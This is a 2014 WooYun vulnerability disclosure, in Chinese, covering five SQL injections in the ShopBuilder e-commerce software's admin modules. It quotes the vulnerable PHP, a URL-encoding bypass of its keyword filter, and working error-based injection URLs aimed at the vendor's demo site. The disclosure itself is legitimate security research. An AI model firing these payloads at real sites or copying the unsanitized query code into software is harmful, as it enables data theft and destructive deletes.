当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072822

漏洞标题:ShopBuilder网上商城 get型 sql注入打包 (1~5) 官网demo测试成功

相关厂商:shop-builder.cn

漏洞作者: roker

提交时间:2014-09-29 18:48

修复时间:2014-12-28 18:50

公开时间:2014-12-28 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-30: 厂商已经确认,细节仅向厂商公开
2014-10-03: 细节向第三方安全合作伙伴开放
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-28: 细节向公众公开

简要描述:

rt

详细说明:

首先get类型是有过滤的 

if(inject_check($_SERVER["REQUEST_URI"]))
	{
		die('Invalid URL !');
	}
function inject_check($sql)
{ 
	return preg_match("/(select|insert|delete|\.\.\/|\.\/|union|into|load_file|outfile|\'|%27|{|\()/i", $sql);// 进行过滤   
}


不过这个过滤我们可以无视,url编码即可绕过
#1
module\vote\admin\vote.php(审核看清了哦 和这个不一样的 WooYun: ShopBuilder商城 v5.6.1 sql注入 #1 )
49行

if(!empty($_GET['vid']))
{
	$sql="select * from ".NEWSVOTE." where id=$_GET[vid]";	
	echo $sql;
	$db->query($sql);
	$re=$db->fetchRow();
	$vote=explode('|',$re['votetext']);
	for($i=0;$i<count($vote);$i++)
	{
		$vote[$i]=explode(',',$vote[$i]);
	}
}


vid 没有过滤
官网测试 http://www.a5shop.cn/?m=vote/admin&s=vote&vid=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29

1.jpg


#2
module\vote\admin\vote_list.php

if(!empty($_GET['did']))
{
	$id=$_GET['did'];
}
if(!empty($id))
{
	if($submit==lang_show('del') or !empty($_GET['did']))
	{
	   $sql="delete from ".NEWSVOTE." where id in ($id)";
	}
	if($submit==lang_show('bres'))
	  $sql="update ".NEWSVOTE." set type=1 where id in ($id)";
	if($submit==lang_show('nbres'))
	  $sql="update ".NEWSVOTE." set type=0 where id in ($id)";
	 $db->query($sql);
}


did没有过滤然后带入id进行了查询
官网测试
http://www.a5shop.cn/?m=vote/admin&s=vote_list&did=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#3
module\news\admin\news.php
92 行

if($_POST['act']=='edit' and !empty($_GET['newsid']))
	{
		$sql="update ".NEWSD." set title='$_POST[title]',ftitle='$_POST[ftitle]',keyboard='$_POST[key]',titleurl='$_POST[links]', isrec='$_POST[rec]', istop='$_POST[istop]',ispass='$_POST[pass]',onclick='$_POST[onclick]',titlefont='$titlefont',uptime='$time',smalltext='$_POST[smalltext]',writer='$_POST[writer]',source='$_POST[source]',titlepic='$pname',ispic='$ispic',isgid='$_POST[group]',ispl='$_POST[closepl]',userfen='$_POST[userfen]',newstempid='$_POST[newstempid]',imgs_url='$imgs_url',videos_url='$video_url',vote='$vote',admin='$_POST[admin]',special='$special',lastedittime='".time()."' where nid= $_GET[newsid]";
		$re=$db->query($sql);
		$sql="update ".NEWSDATA." set con='$_POST[body]' where nid= $_GET[newsid]";


newsid没有过滤
官网测试
http://www.a5shop.cn/?m=news/admin&s=news&newsid=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#4
module\news\admin\newslist.php
开头处

if(!empty($_GET['did']))
{
	$id=$_GET['did'];
}
if(!empty($id))
{
	if($submit==lang_show('del') or !empty($_GET['did']))
	{
	   $sql="delete from ".NEWSD." where nid in ($id)";
	   $db->query($sql);
	   $sql="delete from ".NEWSDATA." where nid in ($id)";
	}


官网测试
http://www.a5shop.cn/?m=news/admin&s=newslist&did=1%29%20and%201=updatexml%281,concat%280x5c,%28select%20user%28%29%29%29,1%29%23
#5
module\news\admin\newslist.php
37行

if($submit==lang_show('copy') and !empty($_GET['nclass']))
	{ 
		foreach($_GET['chk'] as $val)
		{
			$sql="INSERT ".NEWSD."(title,ftitle,keyboard,titleurl,isrec,istop,ispass,firsttitle,onclick,titlefont,uid,uptime,smalltext,writer,source,titlepic,ispic,isgid,ispl,userfen,newstempid,pagenum,imgs_url,videos_url,vote,special,classid,lastedittime) select title,ftitle,keyboard,titleurl,isrec,istop,ispass,firsttitle,onclick,titlefont,uid,uptime,smalltext,writer,source,titlepic,ispic,isgid,ispl,userfen,newstempid,pagenum,imgs_url,videos_url,vote,special,'$_GET[nclass]',lastedittime from ".NEWSD." where nid =$val";
			$db->query($sql);
			$id=$db->lastid();
			$sql="INSERT INTO ".NEWSDATA." (con,nid) select con,$id from ".NEWSDATA." where nid =$val";
			$re=$db->query($sql);
		}
	}


nclass不为空且chk为数组时 带入了数据库
官网测试
http://www.a5shop.cn/?m=news/admin&s=newslist&nclass=1&chk[]=1%29 and 1=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29%23

漏洞证明:

1.jpg

修复方案:

过滤

版权声明:转载请注明来源 roker@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-09-30 09:15

厂商回复:

新版本已修复

最新状态:

暂无